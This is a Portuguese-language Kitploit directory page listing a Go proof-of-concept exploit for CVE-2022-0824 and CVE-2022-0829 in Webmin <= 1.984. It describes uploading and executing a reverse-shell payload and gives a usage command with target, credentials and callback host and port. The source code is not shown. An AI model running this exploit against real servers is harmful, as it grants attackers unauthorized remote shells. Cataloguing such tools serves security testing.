Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
golang-webmin-CVE-2022-0824-revshell — Exploração POC para CVE-2022-0824 | Kitploit
Ferramentas/GitHubGitHub/pizza-power/golang-webmin-cve-2022-0824-revshell
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubpizza-power/golang-webmin-cve-2022-0824-revshell

golang-webmin-CVE-2022-0824-revshell

Exploração POC para CVE-2022-0824

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
31há 3 anosAinda não revisado
Compartilhar

golang-webmin-CVE-2022-0824-revshell

RCE em Webmin <= 1.984

CVE-2022-0824 e CVE-2022-0829

Isso explora uma BAC vuln no Webmin para fazer upload de um arquivo malicioso, altera as permissões no arquivo e executa o arquivo. O arquivo, criado na função makePayload, é um reverse shell de volta para um servidor controlado pelo atacante.

Uso

go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444

t -> url alvo
c -> credenciais para o webmin
sl -> seu IP e porta do servidor local para hospedar seu payload
s -> ip de callback
p -> porta de callback

Referências

https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824

Baixar ferramenta